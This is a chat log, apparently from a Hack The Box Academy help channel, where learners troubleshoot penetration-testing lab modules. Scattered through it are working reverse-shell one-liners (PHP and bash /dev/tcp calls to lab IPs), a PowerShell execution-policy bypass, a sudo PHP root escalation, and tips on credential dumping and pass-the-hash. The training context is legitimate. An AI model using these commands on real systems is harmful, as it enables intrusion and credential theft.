#modules

1 messages Β· Page 116 of 1

rapid sparrow
#

thanks a lot

languid juniper
#

now I am trying to access the ssh using the downloaded id_rsa using the command :

mellow summit
#

Can anyone help me understand a concept further in windows priv esq module? i don't understand how something is working but i've answered the question..

languid juniper
#

what should the permissions be here? chmod 600 ?

sinful falcon
languid juniper
barren apex
#

Yeah i think im on the right tracks, cheers

thorn urchin
languid juniper
#

Im a dummy

#

thank you

#

hence why I think I need to spend 5400 for a course πŸ˜‰

mellow summit
#

I'm confused over the windows priv esq module where it asks "What non-default privilege does the htb-student user have?" I've found the answer by accident/chance. How do i identify that i can use admin cmd prompt and why does it work if applocker is denied amongst other controls??

quasi wave
#

I'm getting closer but its not giving me a shell

barren apex
quasi wave
mellow summit
quasi wave
#

i tried the tutorial you linked and it doesn't give me a shell

rapid sparrow
#

how you could elevate to admin...

quasi wave
#

can someone help me with this?

rapid sparrow
#

I cannot run powershell

mellow summit
#

i don't understand how you are supposed to identify that the user can use cmd admin other than right clicking :l

sleek shell
#

Well, it gives lots of stuff and i do not understend how to analyse it

quasi wave
#
─[us-academy-1]─[10.10.15.25]─[htb-ac-605555@htb-gtt4raddms]─[~]
└──╼ [β˜…]$ nc -lvnp 1234
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: bind to :::1234: Address already in use. QUITTING.
#

so clearly something is working but when I do this

#
echo $TERM
#

I get the result the tutorial says

β”Œβ”€[us-academy-1]─[10.10.15.25]─[htb-ac-605555@htb-gtt4raddms]─[~]
└──╼ [β˜…]$ echo $TERM
xterm-256color```
#

but the next thing I do from tutorial does nothign

thorn urchin
#

relaunch the shell

quasi wave
#

ok

thorn urchin
#

you gotta have that connection received message

rapid sparrow
#

how you could run powershell script...?

thorn urchin
#

gotta set execution policy to bypass

sinful falcon
#

powershell -ep bypass

trail leaf
#

Add -scope process if you’re extra responsible

quasi wave
#

it keeps disconnecting here's what I have now that I keep relaunching shell. if i try typing stuff from terminal 3 into terminal 2 it won't let me type anything

#

like it keeps dropping the shell

#

and I keep having to relaunch it

thorn urchin
#

thatll just mess up your terminal

quasi wave
#

ok I see

thorn urchin
#

I dont see the connection received in those, so you havnt relaunched the revshell again yet

#

listener active -> launch shell -> verify you can write commands -> upgrade shell

#

any of that out of order and youll have a sad time

quasi wave
#

now its saying I connected but not giving me a shell again

thorn urchin
#

show image

quasi wave
#
us-academy-1]─[10.10.15.25]─[htb-ac-605555@htb-gtt4raddms]─[~]
β”Œβ”€[us-academy-1]─[10.10.15.25]─[htb-ac-605555@htb-gtt4raddms]─[~]
Ncat: Version 7.93 ( https://nmap.org/ncat )
                                            Ncat: Listening on :::1234
                                                                      Ncat: Listening on 0.0.0.0:1234
                     Ncat: Connection from 10.129.42.249.
                                                         Ncat: Connection from 10.129.42.249:47270.
#

hold on

thorn urchin
#

Id want to see everything after the connection from

quasi wave
#
β”Œβ”€[us-academy-1]─[10.10.15.25]─[htb-ac-605555@htb-gtt4raddms]─[~]
Ncat: Version 7.93 ( https://nmap.org/ncat )
                                            Ncat: Listening on :::1234
                                                                      Ncat: Listening on 0.0.0.0:1234
                     Ncat: Connection from 10.129.42.249.
                                                         Ncat: Connection from 10.129.42.249:47270.
                   β”Œβ”€[us-academy-1]─[10.10.15.25]─[htb-ac-605555@htb-gtt4raddms]─[~]
Ncat: Invalid source port number "1234s". QUITTING.
                                                   β”Œβ”€[us-academy-1]─[10.10.15.25]─[htb-ac-605555@htb-gtt4raddms]─[~]
Ncat: Version 7.93 ( https://nmap.org/ncat )
                                            Ncat: Listening on :::1234
                                                                      Ncat: Listening on 0.0.0.0:1234

#

and now its just stuck on there and won't show me output of commands

thorn urchin
#

are you closing out of it after the connection from response

quasi wave
#

not purposely

#

hold on

#

I'm continually trying this stuff. Does anyone have time in a few minutes to help me one on one in maybe an hour or 45 minutes?

#

thanks

thorn urchin
#

if its auto closing the connection could be something funky with shell_exec. I usually use system() instead

quasi wave
#

ok cool

#

I will try that

#

I gotta get some lunch

#

I'll be right back

fresh pine
#

In ATTACKING COMMON APPLICATIONS >>
Other Notable Applications
I'm running into a reverse shell problem. __I seem to catch the shell but when i do anything it exits. __

Can anyone tell what i'm doing wrong?

thorn urchin
#

you havnt done a revshell at all

fresh pine
#

I tried to catch it with msfconsole too (right screen)

thorn urchin
#

it does confirm you have code execution though, so all you need to do is give it a proper payload

#

bro

#

theres no shell to catch

#

google Invoke-webrequest

fresh pine
#

ok, i get it now, i though it was in the script. Sometimes i blur things haha (english second language)

thorn urchin
#

the exploit code executes whatever command you supply it. Up to you to give it a revshell or whatever you want it to run

fresh pine
#

awesome, thank you 🫢

barren apex
#

Really cant work out how to get to DC on the pivoting and portforwarding skills assesments, any hints

thorn urchin
#

unfortunately my notes just says

'chain connection from IP1 to IP2'

barren apex
#

I am on host 3 and trying to get to 4

#

doing my head in for like 3 hours now

thorn urchin
#

fwiw im 100% positive I used chisel like exclusively on that assessment but if I were to do it all over again, Id use ligolo-ng the whole way

barren apex
#

when you had v's hash did you crack it or pth?

flat silo
#

I'm working on the whitelist filters in the file upload module, I got the flag and understand how I bypassed everything but it says another way to try is character injection so I wrote out the bash script and added other php extensions as they suggested but I'm not getting any successful hits. Has anyone else had this issue? As I said it's not super important I've found the flag and bypassed everything with double extensions just wondering what's going on with the other way to do it.

thorn urchin
#

my notes dont say

#

what type of hash is it

barren apex
#

its NT but i cant seem to crack it, and all my attempts of anything arent working

thorn urchin
#

if its a nt hash then pth ought to be viable most of the time

#

assuming that is the necessary user

#

what are you using to pivot with, could be the double hop problem

barren apex
#

been trying to PTH, however nothing seems to work

#

rdp doesnt connect on the DC, the only thing that does is on win explorer but I need the password to access the shares

thorn urchin
#

are you trying to pth from a box you already pth to

barren apex
#

how?

thorn urchin
#

crackmapexec can

#

keep in mind idk if thats the intended route

barren apex
#

yeah but im in a rabbit hole of proxies so that wont work right now

thorn urchin
#

you can absolutely proxy cme

#

also I think I just remembered something about that skill assessment

barren apex
#

proxychains into an ubuntu rdp then a port forward to another RDP

thorn urchin
#

from within rdp you can just set up a new proxy to chain through

#

and just not bother with rdp any further

barren apex
#

so forward to 445? instead of 3389

thorn urchin
#

whatever you like

#

worlds your oyster

tiny reef
#

In Web Attacks | Mass IDOR Enumeration, when using CURL the documents disappear all the time curl -s http://url....../documents.php?uid=1" does not work, even though its in the module but curl -s http://url....../documents.php"-d="uid=1" works somehow?

thorn urchin
#

just copy over the pivoting tool you prefer and run it from the rdp session

thorn urchin
#

you get v user, then go after a workstation before going after dc

barren apex
#

ive gone, web shell > ubuntu > win1 > win2 and now trying to get into dc

#

yes im logged in as v on a workstation

#

just cant get this damn dc

thorn urchin
#

yeah but v creds might not be the path to dc

#

idr

#

idk Id probably have to redo the skill assessment to know for sure whats going wrong

gentle root
#

For linux privesc - Shared Libraries - What like informs you (enumeration perspective) when you will / should use a shared library privesc? Just simply a sudo -l with no GTFObin?

steady hawk
barren apex
#

yep and the other one after

steady hawk
#

||You don't need to get into the DC. Look around the file system||

barren apex
#

Ive noted the drive, but i dont have the password?

steady hawk
#

How did you log in then?

barren apex
#

pth

steady hawk
#

ah

barren apex
#

is there a password on .25

steady hawk
#

you should get the cleartext for v somehow

barren apex
#

right ok

#

ive been trying to pivot for about 2 hours lol

thorn urchin
#

you can also pth for shares as well

barren apex
#

port forward to 445 and use cme?

thorn urchin
#

might need 139 too, idr

#

but yeah cme and smbclient can pth

tawdry vapor
#

Anyone help me with the password attack module with this question? What credentials does Bob use with WinSCP to connect to the file server? (Format: username:password, Case-Sensitive)

thorn urchin
#

assuming that user is the path forward and shares are the route

#

or work harder getting thr cleartext creds

tawdry vapor
barren apex
#

there I was trying to what the module is tessting me on

#

cheers

primal eagle
#

1 cubes!

thorn urchin
#

this wont be the last time you need to pivot and they wont necessarily tell you that you should pivot

#

youll have to know thats what you need to do.

barren apex
#

Onto Active Directory next sadglas

thorn urchin
#

And that goes for most of the lessons taught

primal eagle
barren apex
primal eagle
#

I'm rolling in student subscription

barren apex
#

or cme

thorn urchin
#

have you read it

primal eagle
#

Maybe

#

or

#

start lazagne.exe all

tawdry vapor
primal eagle
#

Download it

tawdry vapor
barren apex
primal eagle
#

They tell you in the module how to transfer it

thorn urchin
#

put lazagne on the machine

primal eagle
#

If you use xfreerdp you can just drag the Downloaded file onto it's desktop

#

Just use a python webserver for transfer πŸ™‚

#

python3 -m http.server 8080

tawdry vapor
#

I don't know why but the file was not going, then I restarted the lab and now it was

#

thanks

zinc marsh
bronze raft
#

I got an error while start instance, it shows the request validation failed

#

Any help?

wooden dust
#

how long usually does it take to finish "Attacking Enterprise Networks" module blindly? if i spent 1.5 day with little hints should i be worried about exam? xD

thorn urchin
#

I did it in about a weekend, but your mileage may vary

civic zenith
#

Got this reverse shell but nothing works

keen axle
#

For attacking thick clients anyone have an idea what went wrong with me recreating the jar file?

java -jar -cmf META-INF/MANIFEST.MF fatty-client-fixed_port.jar *
Error: Invalid or corrupt jarfile META-INF/MANIFEST.MF

I changed the port in beans.xml to 1337, redid the hash and updated the MANIFEST.MF file with it, removed the signing files

#

This module is brutal man

thorn urchin
#

my advice with that module is to watch the ippsec video on Fatty. The entire section is ripped from the insane ranked box nearly 1 to 1

keen axle
#

I'm following 0xdf's write up but will try that video

thorn urchin
#

that section went smoothly for me but lots of people said that video helped more

keen axle
#

hey wait

#

nevermind, thanks ill take a look

zinc marsh
#

yea I just did it watching that video

keen axle
#

I spent like four hours trying to reverse the stupid oracle exe

#

just find out that's not even the point

zinc marsh
#

I was able to do it till the sql injection part following the section

#

but after that I wasn't able to perfom the sqli

keen axle
#

academy is great but this needs to be reworked imo

thorn urchin
#

oh this is already the fixed version of that section πŸ™‚

#

it used to be worse

keen axle
#

omg hahahah

#

well I guesss "try harder" right

zinc marsh
thorn urchin
#

it was so bad on release staff had to come out and assure people the content wouldn't be on the exam

zinc marsh
#

piece of cake now kek

thorn urchin
#

it literally used to look like a draft 1

clever ingot
#

I’m in the footprinting medium box and it’s rough. Can anyone help me with it? I got a lot of what I need. Just can’t implement it now

thorn urchin
#

like four screen shots with one sentence annotations

thorn urchin
#

it was really bad

keen axle
#

classic off sec write ups

zinc marsh
#

I spent 4 or 5 days just to complete that section...

thorn urchin
#

so bad I had a staff member actually cussing about it cause they were also mad it got released like that

zinc marsh
#

they hadn't other easier example

civic zenith
#

Im on the AD Skill assessment. My Powershell reverse shell is not running any commands successfully.

#

Anyone know how to get a functional reverse shell from the given web shell?

thorn urchin
#

sounds like your payload is bunk

#

but I didn't bother getting a rev shell

#

I just uploaded my pivot tool and skipped working from the box

civic zenith
#

Wow thats creative as heck maybe ill try that

keen axle
#

this is mad confusing lol

thorn urchin
#

the oracle one is brain dead easy. Dnspy is a great tool

keen axle
#

omfg you're right

thorn urchin
#

its my tool of choice when im reversing and modding unity games

keen axle
#

I had the answer I was just putting it into the wrong section

#

ty anyway

quasi wave
#

hi I am getting back to the HTB challenge

#

hi so I am trying to get a reverse shell at the end of getting started module. I am following the tutorial @thorn urchin posted but I am having some trouble with it. I'm stuck at the point in this screenshot.

#

I'm using system like you guys recommended instead of shell_exec

thorn urchin
#

are you getting the connected message

quasi wave
#

yes

#

it says connected but I can't see a shell and the terminal gets stuck

thorn urchin
#

also I see you tried upgrading a shell again without having a shell already, dont do that until youve confirmed you can run commands on the target

#

you wont see a shell

#

but it shouldnt close out either

#

it should get a connected message and just stay there

quasi wave
#

it gets a connected message but it never stays there

thorn urchin
#

are you closing out the tab from the page you loaded

quasi wave
#

no

thorn urchin
#

good

#

lets see

#

whats the exact php payload youre using again

quasi wave
#
<?php $sock=fsockopen("10.129.109.194",1234);system("/bin/sh -i <&3 >&3 2>&3"); ?>```
thorn urchin
#

also after trying the terminal upgrade stuff have you completely exited the terminal and opened up a new one to start listening again

quasi wave
#

yes

thorn urchin
#

ah yeah that payload wont work

quasi wave
#

ok

thorn urchin
#

youre mixing two diff payloads

quasi wave
#

ok

#

I am not an expert on payloads

thorn urchin
#
<?php system("/bin/bash -c '/bin/bash -i >& /dev/tcp/10.129.109.194/1234 0>&1'"); ?>
#

try this one

quasi wave
#

its still not working

thorn urchin
#

do you get the connection

quasi wave
#

hold on

#

no no connection but hold on let me try it a different way

thorn urchin
#

yeah remember to replace the IP with whatever your tun0 ip is

quasi wave
#

I got the shell

#

thanks

thorn urchin
#

πŸ‘

quasi wave
#

but its not giving me it as root

#

I have flag for user already

thorn urchin
#

you probably have to escalate privileges

quasi wave
#

ok

thorn urchin
#

its not very typical for web services to be running as root

#

except for some windows nonesense

quasi wave
#

ok but then what was the point in getting the shell if I had gotten one earlier and gotten user

#

is it easier to get root with PHP?

#

I need LinPEAS right?

#

hold on

thorn urchin
#

I dunno, you were just trying to get a revshell so thats what I was helping with πŸ˜‚

#

I didnt know you already had access as the user

quasi wave
#

well that was a good refresher hold on

thorn urchin
#

learning some basic revshells is definitely important so this was not wasted practice

quasi wave
#

I agree

thorn urchin
#

before even checking with linpeas though the first two things Id check would be sudo perms and group permissions

#

just cause theyre fast to check and can lead to easy wins

quasi wave
#
www-data@gettingstarted:/var/www/html/admin$ sudo -l
sudo -l
Matching Defaults entries for www-data on gettingstarted:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php
thorn urchin
#

there ya go

#

sudo perms over the php binary

quasi wave
#

how do I do that? last time I got this far I thought there was a php vulnerability which is what today earlier was over

thorn urchin
#

this isnt necessarily a php vulnerability, this is a sudo misconfiguration

quasi wave
#

ok

thorn urchin
#

sudo allows you to run other commands as different users. In the above output its basically telling you that you can run php as any user(including root) without using a password

#

so you can just make a little snippet to spawn a shell with php, and execute it with sudo

#

you dont have to make it a revshell either

#

since you already have a shell

quasi wave
#

so I write a text file and upload it?

#

or do I use nano?

thorn urchin
#

you could do those

#

you can also look up the php binary's arguments to see how to just execute a line without needing to run any files

#

dealers choice here

quasi wave
#

how do I execute it inline?

thorn urchin
#

Look it up

quasi wave
#

ok now I'm here:

www-data@gettingstarted:/var/www/html/theme/Innovation$ php -r '$sock=fsockopen("10.10.15.25",1234);system("/bin/sh -i <&3 >&3 2>&3");'
<10.15.25",1234);system("/bin/sh -i <&3 >&3 2>&3");'    
PHP Warning:  fsockopen(): unable to connect to 10.10.15.25:1234 (Connection refused) in Command line code on line 1
sh: 1: 3: Bad file descriptor
#

I looked it up and its saying bad file descriptor

#

is this closer?

www-data@gettingstarted:/var/www/html/theme/Innovation$ php -r 'system("/bin/sh -i <&3 >&3 2>&3");'
<vation$ php -r 'system("/bin/sh -i <&3 >&3 2>&3");'    
sh: 1: 3: Bad file descriptor
thorn urchin
#

idk where you got that sh -i payload from, I wouldnt use it

#

also you dont need a revshell cause you already have a shell

#

you can just call /bin/sh or /bin/bash

quasi wave
#
www-data@gettingstarted:/var/www/html/theme/Innovation$ php -r '/bin/sh;'
php -r '/bin/sh;'
PHP Parse error:  syntax error, unexpected '/', expecting end of file in Command line code on line 1
thorn urchin
#

youll still need system ofc

#

system is executing the command youre providing to it

#

if youre not calling system, php is going to assume that youre giving it more php code

quasi wave
#
<www/html/theme/Innovation$ php -r 'system(/bin/sh)'    
PHP Parse error:  syntax error, unexpected '/' in Command line code on line 1
www-data@gettingstarted:/var/www/html/theme/Innovation$ php -r 'system("/bin/bash")'
<html/theme/Innovation$ php -r 'system("/bin/bash")'    
PHP Parse error:  syntax error, unexpected end of file in Command line code on line 1
thorn urchin
#

getting closer

#

you forgot your ;

#

youre gunna have one more issue as well btw

quasi wave
#

thrown in Command line code on line 1

#

you are right

#

hold on

fathom pendant
#

It's a very basic thing

thorn urchin
#

theyre very new it seems

quasi wave
#

do I need sudo?

thorn urchin
#

but trying

thorn urchin
#

or else the system doesnt know you wanted to run it as root

fathom pendant
#

^

quasi wave
#

I completed the module

#

thank you

fathom pendant
#

@quasi wave I'd suggest looking at gtfobins/saving it

thorn urchin
#

congrats

sage jackal
#

Guys is there an issue on the new network traffic analysis module ARP spoofing and abnormality section? I’m pretty sure I’m using the correct filter but it shows that my answer is incorrect

quasi wave
#

lmao I think after I get through next module I'm gonna subscribe to HTB Main Platform

#

in addition to academy that I'm already subscribed to

#

I could use the extra practice

thorn urchin
#

good idea

quasi wave
#

ya

thorn urchin
#

they have a new guided mode that may be useful

quasi wave
#

oh cool

thorn urchin
#

@quasi wave also dont forget to take down notes about what you went through today. Especially notes on any part you particularly struggled with.

trail leaf
#

Keeping notes of what you do in labs is very useful when you vaguely remember doing something down the line and need a refresher or can't find the original thing you googled

fathom pendant
#

Hey @quasi wave may I dm you in a few hours when I'm home. This is related to academy stuff as I've noticed a heavy pattern

quasi wave
wild dragon
#

Completed all badges

tight mesa
#

hi anyone know what means this error: Warning: Identity file ||mike||@IP_addr not accessible: No such file or directory, I used the command chmod 600 id_rsa previously to try establish the ssh connection

acoustic owl
wild dragon
#

kek hehe @acoustic owl

modern falcon
#

This might be a stupid question but can you use local windows escalation techinques like the token impersonation attack on domain joined host?

tight mesa
#

hello everyone, I'm stuck with LabEasy from Password Attack

#

I found an id_rsa but, when I try to log in throu ssh with that id_rsa is not working

#

I tried log in as root as well with no success either

#

any hint..!!!

thorn urchin
#

you say not working but thats not very informative

#

what error or result are you getting when you try

tight mesa
#

||mike||@10.129.202.219: Permission denied (publickey).

thorn urchin
#

show full output

acoustic owl
#

Check the file permissions

tight mesa
#

what file permissions?

tight mesa
#

this is what I got with root

`$ ssh -i root@10.129.202.219
Warning: Identity file root@10.129.202.219 not accessible: No such file or directory.
usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface]
[-b bind_address] [-c cipher_spec] [-D [bind_address:]port]
[-E log_file] [-e escape_char] [-F configfile] [-I pkcs11]
[-i identity_file] [-J [user@]host[:port]] [-L address]
[-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
[-Q query_option] [-R address] [-S ctl_path] [-W host:port]
[-w local_tun[:remote_tun]] destination [command [argument ...]]1

thorn urchin
thorn urchin
tight mesa
#

what?, -i is not the ssh argument?

thorn urchin
#

it is, but you didnt supply the id_rsa file

#

thats why its misinterpreting the rest of your command

tight mesa
#

ok., let me check my mistake

#

ty

wild dragon
thorn urchin
#

Warning: Identity file root@blah blah blah no such file

tight mesa
thorn urchin
#

well if you shown full output we'd know if that was the case or not

wild dragon
#

chmod 600 <id_rsa_file>
ssh -i <id_rsa_file> <your_user>@<IP_target>

fathom pendant
tight mesa
#

well I don't understand... the machine is alive but ssh is frozen....

`╭─linux@samsung in ~/Documents/HTB/Academy/PasswordAttack/LabEasy
β•°$ ping -c 2 10.129.202.219
PING 10.129.202.219 (10.129.202.219) 56(84) bytes of data.
64 bytes from 10.129.202.219: icmp_seq=1 ttl=63 time=74.5 ms
64 bytes from 10.129.202.219: icmp_seq=2 ttl=63 time=77.8 ms

╭─linux@samsung in ~/Documents/HTB/Academy/PasswordAttack/LabEasy
β•°$ ssh -i id_rsa root@10.219.202.219
ssh: connect to host 10.219.202.219 port 22: Connection timed out`

#

and ssh is listening

╭─linux@samsung in ~/Documents/HTB/Academy/PasswordAttack/LabEasy β•°$ nc 10.129.202.219 22 SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.4

ashen peak
#

Hello everyone, I'm currently doing this penetration tester path and I'm stuck at the module: Getting Started > Attacking your first box > Nibbles - Initial Foothold
I tried getting the flag.txt without using msfconsole but netcat isn't opening any session after uploading the php image. I also tried using msfconsole but it's not opening session also. It keeps saying I should manually clean up the image.php on the target, whereas I didn't upload any image.php for this session.

compact jacinth
#

Hi im new here, just a quick question. I just started with the "linux fundamentals" and now when im gonna start learning it, it tells me to get the VPN connection file and start vpn server and all that. Is that needed to continue or just something you can do? I looked at guides and all that for the VPN in hack the box. But i cant find out if it is optional or that you have to get the openvpn?

fiery berry
compact jacinth
#

so it is just to install openvpn on my windows then? @fiery berry

fiery berry
proud pine
rare topaz
#

you dont need to use the vpn file if you plan on using pwnbox (cloud parrotos instance)

#

If you do plan on using it, run it on ur own vm via vmware or vbox

compact jacinth
#

well im new so i plan on only using the pwnbox thats in the browser

fiery berry
compact jacinth
#

just so i know that i understand the "My workstation" in the browser is pwnbox right? and the vpn is only if i wanna run it on my linux just to be safe

simple pine
proud pine
#

but a better answer would just be that this is an open network, and while HTB say that there hasn't been any instance that they know about where one user hacked another, it's still better to err on the side of caution.

simple pine
#

Ah right I see

pulsar needle
compact jacinth
#

ooooh now i see i dont need to download anything, everything is already in "my workstation" in the browser right?

acoustic owl
barren apex
pulsar needle
#

Hahahahha nice

tender lake
#

I'm stuck on the Pivots module, trying to do a pingsweep from within the meterpreter session but whenever I use the command shown in the section meterpreter > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23 I just get a wall of error messages ... 0.1.50/lib/rex/socket.rb:651:in `block (2 levels) in tcp_socket_pair' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.50/lib/rex/socket.rb:650:in `synchronize' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.50/lib/rex/socket.rb:650:in `block in tcp_socket_pair' from /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn' from /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'...
When I use use post/multi/gather/ping_sweep in meterpreter, I get the following output Loading extension post/multi/gather/ping_sweep... [-] Failed to load extension: x86_64-linux-musl/post/multi/gather/ping_sweep not found
Note that I am using a Kali vm and not the pwnbox

Is there anything I can do to fix this?

barren apex
#

i think the latest version of kali has an issue as its only started recently

tender lake
wild dragon
wild dragon
rustic sage
#

Hello

round gale
#

in the introduction to sqlmap module, there is a section for tamper scripts which helps to bypass WAF. how do we know which scripts to use in a real life pentest ? is it just by trial and error?

mystic cloak
#

trial and error, reading the error messages you recieve, and the output of sqlmap (it makes suggestions on tamper scrpts to use if it detects something)

sly kelp
fluid ibex
#

Hello! I need some help figuring out what I'm doing wrong, I started doing the Operating system fundamentals starting with linux, and I got both first answers right but it doesnt accept my other answers

swift tartan
#

I am currently doing WINDOWS PRIVILEGE ESCALATION - Miscellaneous Techniques.
I managed to get a root shell and dumped the SAM SECURITY SYSTEM files and have some hashes that I were able to crack.
As the question "Using the techniques in this section, find the cleartext password for an account on the target host." is completely fuzzy about what it expects I am stuck now as it won't take two passwords I found for users on that target host.
Can somebody help me pls?

fathom pendant
barren apex
swift tartan
barren apex
#

are they local or domain accounts

proud pine
swift tartan
barren apex
swift tartan
# barren apex are you specifiying this when trying to login?

Hmm I think I didn't express myself well. So the question from the module is "Using the techniques in this section, find the cleartext password for an account on the target host.". I try the two cleartext passwords as answer to the module question, not to login.

quick crane
#

yes

barren apex
swift tartan
#

WINDOWS PRIVILEGE ESCALATION - Miscellaneous Techniques.

barren apex
swift tartan
barren apex
#

some of the questiosn were very confusing

swift tartan
barren apex
rich perch
#

Hello! I'm stuck at the "Sudo" section of Linux Privilege Escalation. I tried running the exploit mentioned in the section (CVE-2013-3156) but it didn't work (can't run sudoedit as root). Am I missing something?

rich perch
fiery berry
#

Did you try to list the sudo privileges at least?

rich perch
rich perch
fiery berry
pulsar needle
#

Ive got the ||Backup.vhd drive off the david user, but how am i supposed to mount to it? I need admin to access it||

acoustic owl
#

This is from the Password Attacks module, right?
Then you have to crack the file, as well as all other files...

rich perch
sage jackal
#

im working on the new module for network traffic analysis. The question is this: Inspect the ARP_Poison.pcapng file, part of this module's resources, and submit the total count of ARP requests (opcode 1) that originated from the address 08:00:27:53:0c:ba as your answer. I am using the filter: arp.opcode == 1 && (eth.src == 08:00:27:53:0c:ba) and I am getting the result 507 from the wireshark statistics page, but that is not the answer?

acoustic owl
#

I had the same problem.
Look at the package no.
I am sure it is wrong but it is accepted

#

I have reported this error

rancid mulch
#

Hi all, I'm stuck on module: Active Directory Powerview, Enumerating AD Users

Find another user with an SPN set that is not listed in the section command output (case-sensitive).

I don't really understand what this question is asking me to do. Any help please?

fresh pine
fiery berry
proud harbor
#

I've completed the free modules on HTB and i want to progress to the one i pay 8USD i have an academic email(I'm a student) I'm low budget and i would want to know what's there for me or what's the best path to take??

fresh pine
sly kelp
fresh pine
#

I'm stuck in Linux Privilege Escalation > Logrotate. I can't seem to find the writable log that I have to modify to force a log rotation.

Any hints would be welcome @digital pewter @modern falcon @twilit gull @slender shoal

neat tide
#

Hello

#

I am stuck at the exercise of bug bounty pathway, Web Requests HTTP, there is an exercise of curl download file and locate flag. What flag I don’t see any flags in the given url

#

Does anyone know anything

#

Module/35/section/219

#

I use this command β€œ curl -o /download.php (ip address and port provided)

#

download.php x
1 <!DOCTYPE html>
2 <html lang="en">
4 <head>
5
<meta charset="UTF-8">
6
Β«meta http-equiv="X-UA-Compatible" content= "IE-edge"
7
<meta name-"viewport" content-"width device-width, initial-scale-1.0">
8
<title>Blank Page</titles
9 </head>
10|
11 <body>
12
This page is intentionally left blank.
13
<br>
14
Using cURL should be enough.
15 </body>
16
17 </html>

#

So now i have to ask the server for the right file

#

Any hints on what changes to the orignal command i have to make

fathom pendant
#

How would you access a webpage on any website

#

:)

neat tide
#

Thank you guys I just found the flag πŸ˜‚πŸ’―β€οΈ

fathom pendant
#

Well what is the last example given on the section

keen halo
fathom pendant
#

So, do something similar

keen halo
#

I hope there is a format for the answer FeelsBadMan

keen halo
dapper fable
#

Trying the new csharp module, wondering if there's an answer key failure

"How can you access the element in the third row and second column of a two-dimensional array named grid in C#? "

#

ive tried all permutations of row/column, column/row, zero- and one-indexing

#

ugh are you kidding, it wants a semicolon

zinc marsh
dapper fable
#

it didnt ask for a complete line, dont enforce syntax

silver mesa
#

Hi Guys,

Currently working on DCSync - Active Directory Enumeration & Attacks. https://academy.hackthebox.com/module/143/section/1489

Question 2 : What is this user's cleartext password?

stuck here! - have the user syncron

So far, I have ntds file using secretsdump.py. I tried mimkatz in administrative mode. but no luck

Can anyone help me with this, will be appreciate.

sly reef
#

actually, this user has reversible encryption. Secretsdump will give you the cleartext straight

fresh pine
rich perch
trail leaf
zinc marsh
trail leaf
#

Gotcha, lemme see what I have in my notes on it

#

Yeah the exercise isn't that much different than the content in the section

#

DM me what it looks like for you right now and we can work through it

fresh pine
vital adder
vital adder
rustic sage
#

Starting Nmap 7.93 () at 2023-08-11 21:58 UTC
Nmap scan report for Mary-PK (192.168.0.4)
Host is up (0.00065s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1947/tcp open sentinelsrm
2869/tcp open icslap
5357/tcp open wsdapi
49156/tcp open unknown
MAC Address: 08:62:66:D7:B5:B3 (Asustek Computer)

vital adder
#

and the last one doesn't work?

silver mesa
#

shall DM you

vital adder
#

sure

kindred tusk
#

Anyone else experiencing issues with the Academy VPN servers? Using the OpenVPN Connect client I constantly loose connection with the server, often not recieving a packet back for 3 minutes. I tried EU1 and EU2 but none remained stable. The build in workstation also drops ssh connections all the time. Only working way is through the integrated terminal. Is there some vpn client setting that I'm missing? Anyone else experienced the same issue?

trail leaf
#

I'm currently working on Attacking Enterprise Networks and having no problems

obtuse fiber
#

Module: Attacking Common Services
Chapter: Attacking SQL Databases
Question: Enumerate the "flagDB" database and submit a flag as your answer.
Issue: I'm trying login using ||m|| user with the password I found but I can't, I have run the below commands from the attack box and got the below errors:
1- ||mssqlclient.py -p 1433 @ IP -windows-auth||
||[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.||
2- ||mssqlclient.py -p 1433 **.**m @ IP -windows-auth||
||[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.||
3- ||mssqlclient.py -p 1433 **.\**m @ IP -windows-auth||
||[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.||
4- ||mssqlclient.py -p 1433 m @ IP||
||[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed for user 'm'.||
5- ||mssqlclient.py -p 1433 .**m @ IP||
||[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed for user '
.**m'.||
6- ||mssqlclient.py -p 1433 **.\m @ IP||
||[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed for user '
.**m'.||
Fix: used the below syntax
||mssqlclient.py [-db volume] -windows-auth <USERNAME>:<PASSWORD>@<IP>||

trail leaf
#

On whatever VPN server is closest for US people

trail leaf
obtuse fiber
vital adder
ashen peak
#

Hi, I'm stuck at https://enterprise.hackthebox.com/academy-lab/3993/4683/modules/77/852

I tried getting the flag.txt without using msfconsole but netcat isn't opening any session after uploading the php image. I also tried using msfconsole but it's not opening session also. It keeps saying I should manually clean up the image.php on the target, whereas I didn't upload any image.php for this session.

fathom pendant
ashen peak
#

Yes it is Marcie

fathom pendant
umbral fulcrum
#

Hi, I'm not sure what that means?
I saw few stuff in the folders but I can't make them work...

ashen peak
#

Hello everyone, I'm currently doing this penetration tester path and I'm stuck at the module: Getting Started > Attacking your first box > Nibbles - Initial Foothold

fathom pendant
rustic sage
#

does it really matter if i unzip or not

#

@fathom pendant

fathom pendant
#

Yes

ivory sandal
#

Hey guys, Im trying the new Network Traffic Analysis module and Im stuck on the first question. Myself and another guy both got the answer ||507|| from the filter that was given in the module but this was incorrect. Can anyone push me in the right direction? https://academy.hackthebox.com/module/229/section/2446

rustic sage
vital adder
fathom pendant
#

Data is stored differently (compressed) in a zip file... so of course it makes a difference

ashen peak
fathom pendant
#

Elaborate

